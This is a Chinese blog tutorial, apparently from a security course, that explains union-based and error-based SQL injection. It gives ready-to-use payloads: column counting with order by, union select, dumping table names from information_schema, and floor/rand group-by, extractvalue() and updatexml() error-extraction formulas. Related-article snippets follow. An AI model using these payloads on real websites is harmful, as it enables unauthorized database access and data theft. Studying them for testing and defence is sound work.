SQL注入之联合查询和报错注入

最新推荐文章于 2025-05-09 20:15:48 发布
最新推荐文章于 2025-05-09 20:15:48 发布
阅读量1k 收藏 3
点赞数 2
CC 4.0 BY-SA版权
文章标签: SQL注入 联合查询 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45076423/article/details/103019004
本文详细介绍了SQL联合查询的基本概念、使用步骤及限制条件,并深入探讨了报错注入的三种方法,包括利用groupby重复键冲突、extractvalue()函数及updatexml()函数进行数据库内容获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

联合查询
联合查询就是利用SQL 语句union select 。
union select 会把两条SQL 语句的查询结果拼接起来,形成一张虚拟的表。联合查询会实现跨库跨表查询,会极大减少SQL 注入的成本。
联合查询有两个限制条件

  1. 两条SQL 语句的查询结果具有相同的列数

  2. 两条SQL 语句相同位置的列具有相同的数据类型
    联合查询通常用在数据库的内容会回显到网页上的情况,所以联合查询通常需要三步:
    1.判断当前表中字段个数
    使用使用语句[?id=1’ order by 1 --+],order by 3 的时候页面正常,当order by 4 时,页面报错。说明当前表中存在3 个字段。
    在这里插入图片描述
    2.判断显示位
    使用语句[?id=-1’ union select 1,2,3 --+]
    在这里插入图片描述

    在页面中可以看到数字2 和3 ,说明显示位是2 和3。

  3. 实现跨库跨表查询
    使用语句[?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+]
    在这里插入图片描述

报错注入

报错注入select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()2))x from information_schema.tables group by x)a
报错注入用在数据库的错误信息会回显在网页中的情况,如果联合查询不能使用,首选报错注入。
报错注入利用的是数据库的报错信息得到数据库的内容,这里需要构造语句让数据库报错。
让数据库报错的语句有很多,原理也不尽相同,还有数据库版本的因素。本章课程推荐同学们把报错的语句当作公式记下来,进行报错注入。以下展示三种报错注入的方法
1. group by 重复键冲突
公式:[?id=1 and (select 1 from (select count(),concat((select 查询的内容 from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) --+]。
提交参数[?id=1’ and () --+]
在这里插入图片描述
2. extractvalue() 函数
公式:[?id=1 and extractvalue(1,concat(’’,(查询的内容),’’))]
提交内容[?id=1’ and extractvalue(1,concat(’^’,(select version()),’^’)) --+]
在这里插入图片描述
3. updatexml() 函数
公式[?id=1 and updatexml(1,concat(’’,(查询的内容),’’),1)] 注释:^ 16进制为0x5e
提交内容[?id=1’ and updatexml(1,concat(’^’,(select database()),’^’),1) --+]

在这里插入图片描述

SQL注入联合查询
m0_56578216的博客
08-22 1171
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用union select 语句,该语句会同时执行两条select 语句,实现跨库、跨表查询。两条select 语句查询结果具有相同列数:对应的列数据类型相同(特殊情况下,条件被放松)。联合查询就是利用SQL语句中的union select语句同时执行两条select语句,实现跨表查询的方法。由于联合查询会将数据库中的两张表按照列数拼接(纵向拼接)后再进行查询,所以要求两条select语句查询的表必须******
MYSQL————联合查询
2301_80251684的博客
08-29 3281
设计数据时把表进行拆分,为了消除表中字段的依赖关系,比如部分函数依赖,传递依赖,这时会导致一条SQL查出来的数据,对于业务来说是不完整的,我们就可以使用联合查询把关系中的数据全部查出来,在一个数据行中显示详细信息两张表建立主外键关系这是两张表,而在实际生活中,我们想要的是将两张表合并,去掉不需要的部分上面这段代码就是一句简单的联合查询
sql联合查询注入报错注入
L1ni01
03-24 282
1.联合查询注入基础 联合查询注入流程 相关函数 相关语句 注释符 注意事项 联合查询注入利用 猜解数列 爆显示位 查询bypass 接下来讲报错注入 报错注入原理 相关函数 注意事项 下面参考这个网址 关于报错注入,可能会有所帮助。 https://sqlmap.wiki/post/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E4%B9%8B%E6%8A%...
【实战】利用联合查询--手工SQL注入拿下网站
weixin_34307464的博客
02-19 171
看到很多脚本小子,工具党用啊D,明小子,穿山甲对网站扫来扫去,拿个后台什么的,其实基础是最重要的,今天我来说一下纯手工注入一个站点。目标网址:http://www.******.com/about.asp?id=11.首先确认这里是否存在整型注入,很简单,url后加' and 1=1 and 1=2,不细说。同时我们还判断出这是Access的数据库。2....
【MySQL联合查询
最新发布
2301_80543957的博客
05-09 3682
联合查询是一种将多个select语句的结果合并成一个结果集。允许垂直合并来自不同查询的数据,前提是这些查询具有相同数量的列且对应列的数据类型兼容。左外连接:返回左表中的所有记录右表中匹配的记录。如果右表中没有匹配的记录,则结果集中对应字段会显示为null;
SQL注入联合查询注入
qq_45100746的博客
05-20 351
一、SQL是什么? SQL是一门数据库语言,它可以让你存储数据操作数据。 常见的数据库有mysqlSQL sever、oracle、Sybase、db2。 二、order by 排序(升序)、desc(降序) 如:select * from uesr order by id; 三、limit 控制输出 select * from 表名 limit 开始位置 结束位置 四、SQL注入:web应用程序对用户输入数据没有进行过滤,或者过滤不严,就把SQL语句带进数据库进行查询。 五、SQL注.
mysql联合查询用order_Mysql联合查询UNIONOrder by同时使用报错问题的解决办法
weixin_29023079的博客
01-19 415
因此,常常出现这样的错误复制代码 代码如下:select * from [IND] where INDID>10unionselect * from [IND] where INDID<9目前为止,还没有出现问之后,也许有人会用到类似的查询复制代码 代码如下:select * from [IND] where INDID>10 order by INDID descunionse...
MySQL多表查询(联合查询、连接查询、子查询)
热门推荐
m0_49864110的博客
07-27 3万+
EXCEPT 将两张表的某些字段的公共记录减去,然后返回一张表的剩余记录(差集)(MySQL不存在,使用NOT IN字段实现)3、作为联合查询的多表之间的列数、以及列数的类型必须相同(例如:表1查询哪些列,表2就查询哪些列)1、通过联合查询,可以得到两张表中记录的集合或者公共记录的集合,或者其中某张表中的记录的集合。将两张表的全部记录交叉组合,在添加了其他表字段的同时,所得的记录数是两张表行数的乘积。#查询张三入职之后的所有员工信息(先查询张三的入职信息,再查询此时间之后的员工信息。
sql注入报错注入
m0_63436163的博客
08-27 1424
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
SQL注入报错注入
qq_68163788的博客
01-27 3292
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
2.sql注入——联合查询/报错注入
qwsn
11-05 2121
Example4: 第一种方法:联合查询暴库 1.访问靶机: 发现URL栏像注入点 ①上图: ②:分析 发现一:如上图所示,访问我的靶机后,出现了两个字段,分别为idname。(字段也就是列) 发现二:URL栏里面,有传参的形式出现(?/req=username='hacker',也就是这个 参数) 注意:%3d为等于号= 注意:%20为空格 注意:%27为单引号 //以上,可以确认为...
SQL 注入报错注入、延时注入、布尔盲注
2301_77160226的博客
08-27 1664
SQL 注入攻击中,报错注入、延时注入布尔盲注是常见的攻击手段。这些攻击方式利用了数据库系统在处理用户输入时的漏洞,从而获取敏感信息或者执行恶意操作。本文将详细介绍这三种 SQL 注入攻击方式的原理实现方法。
联合查询(多表查询)
mzpqq的博客
03-06 1万+
1.前置知识—笛卡尔积 实际开发中往往数据来自不同的表,所以需要多表联合查询。多表查询是对多张表的数据取笛卡尔积。 笛卡尔积是联合查询也就是多表查询的基础。 笛卡尔积又称直积,表示XY,比如A表中的数据有m行,B表中的数据有n行,那么AB做笛卡尔积,结果为mn行 创建一个数据库表: -- 创建数据库 drop database if exists java33; create database java33 default character set 'utf8mb4'; -- 切换数据库 use
SQL 注入——联合查询
weixin_51559599的博客
11-06 1706
information_schema 元数据库中的 columns 表中存储着数据库中所有的列。information_schema 元数据库中的 tables 表中存储着数据库中所有的表。语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。如果报错,则说明没有该列,继续向小的数字更改查询,直到查询出列数最大值。总共有 517 个表名,因为此前查出在 cms 表中,增加筛选条件。此处因为联合查询,每列的数据类型不同而报错,将。查看 cms_users 表中的字段。连接显示出整列中的内容。
第四章 SQL查询之联合语句
dave的技术成长之路
04-19 5451
4.3联合语句 联合语句是指对于多个查询所获得的结果集进行集合操作。这些集合操作包括union、union all、intersectminus。这些集合运算都是二元运算,运算结果仍然是一个记录集合。 求并集(记录唯一)-union运算 union 运算实际是合并两个结果集中的所有记录,将其中重复记录剔除(保证结果集中的记录唯一。) 例 student表 class_one表 select * from student union select * from class_o
聚合查询+联合查询+子查询
爱敲代码的三毛的博客
11-01 4745
文章目录一、聚合查询1.聚合函数二、使用步骤1.引入库2.读入数据总结 一、聚合查询 1.聚合函数 常见的统计总数,计算平均值的操作,可以用聚合函数来实现,常见的聚合函数有: 这些函数都比较简单: 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn a
mysql联合查询(UNION)
一只苟延残喘的卑微蝼蚁
12-26 3万+
mysql联合查询(UNION) 下面我就直接po截图代码 #联合查询 /* union 联合 合并:将多条查询语句的结果合并成一个结果 语法: 查询语句1 union 查询语句2 union ... 应用场景: 要查询的结果来自于多个表,且多个表没有直接的连接关系,但查询的信息一致时 特点:★ 1、要求多条查询语句的查询列数是一致的! 2、要求多条查询语句的查询的每一...
SQL注入流程(联合注入
qq_64395221的博客
05-17 2251
但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;要想第一列取不出数据---要么id特别大,要么id是-1;通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。同理空格也需要编码--- %20 (--+也可以;id=-1' union select 1,database(),3--+ 获取到当前数据库。要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询
SQL注入联合查询
weixin_65633498的博客
04-13 585
由于用户不可控输入,攻击者可以任意的输入网易的。语句,从而对数据库产生风险。三、联合查询手工注入流程。:两个查询语句列数相同。页面异常,原始查询由。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

night.x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值